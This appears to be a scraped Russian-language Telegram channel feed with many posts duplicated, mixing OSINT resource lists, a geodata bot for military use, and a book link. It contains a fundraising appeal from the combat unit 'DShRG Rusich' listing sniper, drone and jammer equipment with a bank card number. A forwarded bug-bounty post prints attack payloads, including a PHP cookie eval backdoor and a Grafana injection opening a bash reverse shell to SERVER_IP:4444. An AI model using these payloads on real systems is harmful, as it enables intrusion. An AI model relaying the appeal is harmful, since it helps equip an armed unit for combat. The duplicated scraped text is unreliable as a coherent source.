Батл с кадровиком.pdf
2.9 MB
Батл с кадровиком. Как пройти собеседование и выполнить все тесты, Ричард Борзов, 2018
🔥2
Forwarded from ДШРГ Русич 🇷🇺
Всем здравия! ДШРГ Русич продолжает выполнение задач на Запорожском направлении несмотря ни на что.
Для продолжения работы на максимальном уровне группе требуется ваша помощь в оснащении оборудованием, не входящим в перечень выдаваемого по линии Минобороны:
- Автомобиль Нива с обвесом и лебедкой.
- Квадрокоптеры Мавик 3 PRO - 2 штуки (расходник который постоянно или глушат РЭБ или сбивают, а на них идёт основная работа днем)
- Двухканальный бинокль с дальномером на охлаждаемой матрице или аналогичный прибор на микроболометре по типу iRay xFuse.
- Тренога для винтовки и бинокля типо Leofoto SO 362
- Крепление (голова) под винтовку и под бинокль MAB-75 с быстрым зажимом
- Метеостанция Kestrel 5700 Elite Link.
- Для обеспечения тренировчного процесса группы и подразделения в штате которого состоим гонги из бронестали типо Хардекс 500 или аналогичной 5ХНМ с термообработкой толщиной 6 мм (3 круга диаметром 25 см, 3 круга диаметром 35 см, 3 грудные мишени номер 4) со стойками.
- Бинокуляр (очки) ночного видения для вождения транспорта типо NVGA - 15,bnvd1431 или Lindu pvs 31
- Инфракрасные фары на ТС, 2 шт.
- Цифровой ретранслятор Hyitera или ZTE.
- Подавитель для дронов на автомобиль по типу "Волнорез", 2 шт.
Также просим помощи на
обслуживание и ремонт имеющегося автомобильного транспорта (например замена пробитого осколком интеркулера за 30 тысяч, ТО, запчасти и другое).
Будем благодарны принять вашу помощь как в натуральном виде (по договорённости человек от нас может временно оттянуться с направления и забрать груз в тылу зоны СВО или в РФ), так и в финансовой форме.
Актуальные реквизиты подразделения:
2202206332014773 сбербанк
тинькофф - заблокирован
Благодарим каждого из вас за помощь.
Победа будет за нами. Слава России
Командир группы "Серб"
Для продолжения работы на максимальном уровне группе требуется ваша помощь в оснащении оборудованием, не входящим в перечень выдаваемого по линии Минобороны:
- Автомобиль Нива с обвесом и лебедкой.
- Квадрокоптеры Мавик 3 PRO - 2 штуки (расходник который постоянно или глушат РЭБ или сбивают, а на них идёт основная работа днем)
- Двухканальный бинокль с дальномером на охлаждаемой матрице или аналогичный прибор на микроболометре по типу iRay xFuse.
- Тренога для винтовки и бинокля типо Leofoto SO 362
- Крепление (голова) под винтовку и под бинокль MAB-75 с быстрым зажимом
- Метеостанция Kestrel 5700 Elite Link.
- Для обеспечения тренировчного процесса группы и подразделения в штате которого состоим гонги из бронестали типо Хардекс 500 или аналогичной 5ХНМ с термообработкой толщиной 6 мм (3 круга диаметром 25 см, 3 круга диаметром 35 см, 3 грудные мишени номер 4) со стойками.
- Бинокуляр (очки) ночного видения для вождения транспорта типо NVGA - 15,bnvd1431 или Lindu pvs 31
- Инфракрасные фары на ТС, 2 шт.
- Цифровой ретранслятор Hyitera или ZTE.
- Подавитель для дронов на автомобиль по типу "Волнорез", 2 шт.
Также просим помощи на
обслуживание и ремонт имеющегося автомобильного транспорта (например замена пробитого осколком интеркулера за 30 тысяч, ТО, запчасти и другое).
Будем благодарны принять вашу помощь как в натуральном виде (по договорённости человек от нас может временно оттянуться с направления и забрать груз в тылу зоны СВО или в РФ), так и в финансовой форме.
Актуальные реквизиты подразделения:
2202206332014773 сбербанк
тинькофф - заблокирован
Благодарим каждого из вас за помощь.
Победа будет за нами. Слава России
Командир группы "Серб"
❤8
Ultimate OSINT Collection
News & blogs
Newsletters
Books
How-to guides
CTFs
Podcasts
Tools collections
and more.
https://start.me/p/DPYPMz/the-ultimate-osint-collection
Contributor twitter.com/hatless1der
News & blogs
Newsletters
Books
How-to guides
CTFs
Podcasts
Tools collections
and more.
https://start.me/p/DPYPMz/the-ultimate-osint-collection
Contributor twitter.com/hatless1der
Forwarded from #Arm1tage
Remote Code Execution | Command Injection
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"
13. Классический RCE через SSRF через Gopher. Статья.14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce
Молния бот.
Добавлено СК42.
Бот поможет получить геоинформационные и метеоданные (спутниковые снимки, карты высот, скорость и направление ветра), а также создать карту по точке на карте и радиусу в километрах вокруг неё.
Теперь координаты и в СК42.
Добавлено СК42.
Бот поможет получить геоинформационные и метеоданные (спутниковые снимки, карты высот, скорость и направление ветра), а также создать карту по точке на карте и радиусу в километрах вокруг неё.
Теперь координаты и в СК42.
Telegram
FPV-выZOV🇷🇺
Молния бот!
Поможет получить геоинформационные и метео данные на требуемый участок местности:
⚡️Спутниковые снимки mbtiles
⚡️Карты высот hgt
⚡️Температура, скорость и направление ветра
Вы можете использовать интерфейс бота для создания карт в формате mbtiles…
Поможет получить геоинформационные и метео данные на требуемый участок местности:
⚡️Спутниковые снимки mbtiles
⚡️Карты высот hgt
⚡️Температура, скорость и направление ветра
Вы можете использовать интерфейс бота для создания карт в формате mbtiles…
🔥1
▶️OSINT Virtual machines and distributions for Practice
• Osintux : http://www.osintux.org/
• BackBox : https://www.backbox.org/
• osintBOX : https://github.com/Dimaslg/osintBOX
• CSI Linux : https://csilinux.com/
• Kali Linux : https://www.kali.org/get-kali/
• ArchStrike : https://archstrike.org/
• Offen Osint : https://github.com/Double2Sky/OffenOsint
• Huron Osint : https://github.com/HuronOsint/OsintDistro
• Septor Linux : https://septor.sourceforge.io/
• Pentoo Linux : https://www.pentoo.ch/
• Tsurugi Linux : https://tsurugi-linux.org/downloads.php
• BlackArch Linux : https://www.blackarch.org/
• Falcon Arch Linux : https://sourceforge.net/projects/falcon-archlinux/
• Fedora Security Lab : https://labs.fedoraproject.org/security/download/index.html
• TraceLabs OSINT VM. : https://www.tracelabs.org/initiatives/osint-vm
• Osintux : http://www.osintux.org/
• BackBox : https://www.backbox.org/
• osintBOX : https://github.com/Dimaslg/osintBOX
• CSI Linux : https://csilinux.com/
• Kali Linux : https://www.kali.org/get-kali/
• ArchStrike : https://archstrike.org/
• Offen Osint : https://github.com/Double2Sky/OffenOsint
• Huron Osint : https://github.com/HuronOsint/OsintDistro
• Septor Linux : https://septor.sourceforge.io/
• Pentoo Linux : https://www.pentoo.ch/
• Tsurugi Linux : https://tsurugi-linux.org/downloads.php
• BlackArch Linux : https://www.blackarch.org/
• Falcon Arch Linux : https://sourceforge.net/projects/falcon-archlinux/
• Fedora Security Lab : https://labs.fedoraproject.org/security/download/index.html
• TraceLabs OSINT VM. : https://www.tracelabs.org/initiatives/osint-vm
Osintux
Osintux | Distribución Linux inteligencia en fuentes abiertas OSINT
Osintux es una distribución Linux en castellano orientada hacia la inteligencia en fuentes abiertas OSINT. Basada en Debian.
👏1
⚠️GEO
GEOINT https://start.me/p/W1kDAj/geoint
GeoNames https://www.geonames.org/
Geoseer.net https://www.geoseer.net/
GeoINT Search https://cse.google.com/cse?cx=015328649639895072395:sbv3zyxzmji#gsc.tab=0
GeoIP Tracker tool https://shadowcrypt.net/tools/geoip
Earth Engine Dataset https://developers.google.com/earth-engine/datasets/
GeoPlatform Portal https://www.geoplatform.gov/
Inspire-geoportal.eu http://www.inspire-geoportal.eu/
FAO Map Catalog https://data.apps.fao.org/map/catalog/srv/eng/catalog.search#/home
Datacore-gn.unepgrid.ch https://datacore-gn.unepgrid.ch/
ISRIC Data Hub https://data.isric.org/geonetwork/srv/eng/catalog.search#/home
geocreepy http://www.geocreepy.com/
US Crisis Monitor https://acleddata.com/special-projects/us-crisis-monitor/
Toronto Live https://apps.esri.ca/torontolive/
Residential Fire Fatalities in Indiana https://www.arcgis.com/apps/dashboards/4d1289ab105145a1b1f80c1ad3cf19fb
geoprotests API https://rapidapi.com/gisfromscratch/api/geoprotests/
geoint-py
A bunch of geospatial intelligence workflows implemented using Python. https://github.com/gisfromscratch/geoint-py
geoclustering https://pypi.org/project/geoclustering/
GEOINT https://start.me/p/W1kDAj/geoint
GeoNames https://www.geonames.org/
Geoseer.net https://www.geoseer.net/
GeoINT Search https://cse.google.com/cse?cx=015328649639895072395:sbv3zyxzmji#gsc.tab=0
GeoIP Tracker tool https://shadowcrypt.net/tools/geoip
Earth Engine Dataset https://developers.google.com/earth-engine/datasets/
GeoPlatform Portal https://www.geoplatform.gov/
Inspire-geoportal.eu http://www.inspire-geoportal.eu/
FAO Map Catalog https://data.apps.fao.org/map/catalog/srv/eng/catalog.search#/home
Datacore-gn.unepgrid.ch https://datacore-gn.unepgrid.ch/
ISRIC Data Hub https://data.isric.org/geonetwork/srv/eng/catalog.search#/home
geocreepy http://www.geocreepy.com/
US Crisis Monitor https://acleddata.com/special-projects/us-crisis-monitor/
Toronto Live https://apps.esri.ca/torontolive/
Residential Fire Fatalities in Indiana https://www.arcgis.com/apps/dashboards/4d1289ab105145a1b1f80c1ad3cf19fb
geoprotests API https://rapidapi.com/gisfromscratch/api/geoprotests/
geoint-py
A bunch of geospatial intelligence workflows implemented using Python. https://github.com/gisfromscratch/geoint-py
geoclustering https://pypi.org/project/geoclustering/
Start.me
GEOINT - Start.me
A startpage with online resources about GEOINT, created by Bruno Mortier.
👏1
Продвинутый поиск по никнейму – Shodan и Netlas
Наш перевод короткой статьи о том, как использовать IP поисковики для поиска по нику на примере Netlas.
Наш перевод короткой статьи о том, как использовать IP поисковики для поиска по нику на примере Netlas.
👍2
Document Cloud
Поиск по более чем 50 млн. документам опубликованных верифицированными медиа и исследователями.
Публикации включают в себя CIA Crest (25-ти летний архив), отчеты, записи судебных дел, гос. проекты и многое другое.
Присутствуют операторы поиска Гугл-стайл
Поиск по более чем 50 млн. документам опубликованных верифицированными медиа и исследователями.
Публикации включают в себя CIA Crest (25-ти летний архив), отчеты, записи судебных дел, гос. проекты и многое другое.
Присутствуют операторы поиска Гугл-стайл
🔥1